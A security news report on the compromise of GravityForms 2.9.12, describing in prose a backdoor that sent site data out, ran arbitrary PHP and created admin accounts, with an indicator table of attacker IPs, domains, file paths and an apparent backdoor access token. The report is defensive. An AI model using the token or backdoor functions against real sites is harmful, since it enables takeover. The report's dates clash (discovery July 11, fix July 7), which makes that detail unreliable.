WordPress GravityForms Plugin Hacked to Include Malicious Code
A sophisticated supply chain attack has compromised the official GravityForms WordPress plugin, allowing attackers to inject malicious code that enables remote code execution on affected websites.
The attack, discovered on July 11, 2025, represents a significant security breach affecting one of WordPress’s most popular form-building plugins, with the malware being distributed directly through the official gravityforms.com domain.
Key Takeaways
1. A sophisticated supply chain attack compromised GravityForms version 2.9.12, injecting malware via the official plugin distribution.
2. The malware enabled remote code execution, data exfiltration, and persistent backdoor access using functions likeupdate_entry_detail()andlist_sections().
3. The malicious domain (gravityapi.org) was shut down, and the developer released a clean version (2.9.13) to stop further infections.
4. Users should update immediately and monitor for suspicious activity, especially unauthorized admin accounts or unusual PHP files.
GravityForms Plugin Hacked
The security breach was first identified by researchers at Patchstack, who received reports of suspicious HTTP requests to an unknown domain, gravityapi.org, originating from the GravityForms plugin.
The malicious domain was registered on July 8, 2025, just days before the attack was discovered, suggesting a carefully orchestrated campaign.
Initial investigations revealed that the compromised plugin version 2.9.12 contained malware that was being distributed through official channels, including manual downloads and composer installations.
However, the attack appeared to have a limited window of opportunity, as RocketGenius, the developer of GravityForms, quickly responded to remove the malicious code from new downloads.
The company confirmed they were conducting a thorough investigation into the breach, and by July 7, 2025, they had released version 2.9.13 to ensure users could safely update without the backdoor present.
Additionally, domain registrar Namecheap suspended the gravityapi.org domain to prevent further exploitation.
The malware operated through two primary vectors, both designed to provide attackers with comprehensive control over infected WordPress installations.
The first method involved a malicious function called update_entry_detail() embedded in the plugin’s common.php file, which automatically executed whenever the plugin was active.
This function collected extensive system information from infected sites, including WordPress version, active plugins, user counts, and server details, then transmitted this data to the attacker-controlled domain.
The response from the malicious server contained base64-encoded payloads that were automatically saved to the infected site’s file system, creating persistent backdoors.
The second attack vector utilized a function called list_sections() that created a sophisticated backdoor system requiring a specific API token for access. This backdoor provided attackers with extensive capabilities:
- Creating administrator accounts with full privileges.
- Executing arbitrary PHP code through eval() functions.
- Uploading malicious files to the server filesystem.
- Listing and deleting existing user accounts.
- Performing comprehensive directory traversals.
- Maintaining persistent access even after discovery.
The malware was particularly dangerous because it could execute arbitrary PHP code through eval() functions, essentially giving attackers complete control over infected websites.
The backdoor also included functionality to create new administrator accounts, effectively ensuring persistent access even if the initial compromise was discovered.
Mitigations
While the full scope of the attack remains under investigation, preliminary assessments suggest the infection was not widespread, likely due to the short timeframe during which the malicious version was available.
Major web hosting companies have begun scanning their servers for indicators of compromise, with results suggesting limited distribution.
The attack highlights the critical vulnerabilities in software supply chains, where even trusted sources can be compromised.
The sophisticated nature of the malware, with its multiple backdoors and comprehensive system access capabilities, demonstrates the advanced techniques employed by modern cybercriminals.
Security firms have identified several indicators of compromise, including suspicious IP addresses (185.193.89.19 and 193.160.101.6), malicious files (bookmark-canonical.php and block-caching.php), and the specific API token used by the backdoor system.
Organizations using GravityForms are advised to immediately update to version 2.9.13 or later, conduct thorough security scans of their WordPress installations, and monitor for any unauthorized administrator accounts or suspicious file modifications.
This incident underscores the importance of maintaining robust security monitoring and the need for enhanced supply chain security measures in the software development ecosystem.
Indicator of Compromises (IoCs):
| Type | Indicator / Detail | Notes |
|---|---|---|
| IP Address | 185.193.89.19 | Potential malicious IP |
| IP Address | 193.160.101.6 | Potential malicious IP |
| Domain | gravityapi.org | Associated with compromise |
| Domain | gravityapi.io | Associated with compromise |
| File Path | gravityforms/common.php | Look for gravityapi.org and update_entry_detail function |
| File Path | includes/settings/class-settings.php | Look for list_sections function |
| File Path | wp-includes/bookmark-canonical.php | Suspicious file |
| File Path | wp-includes/block-caching.php | Suspicious file |
| Hash/String | Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3 | Possibly a file hash, malware signature, or unique identifier |
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
Source link
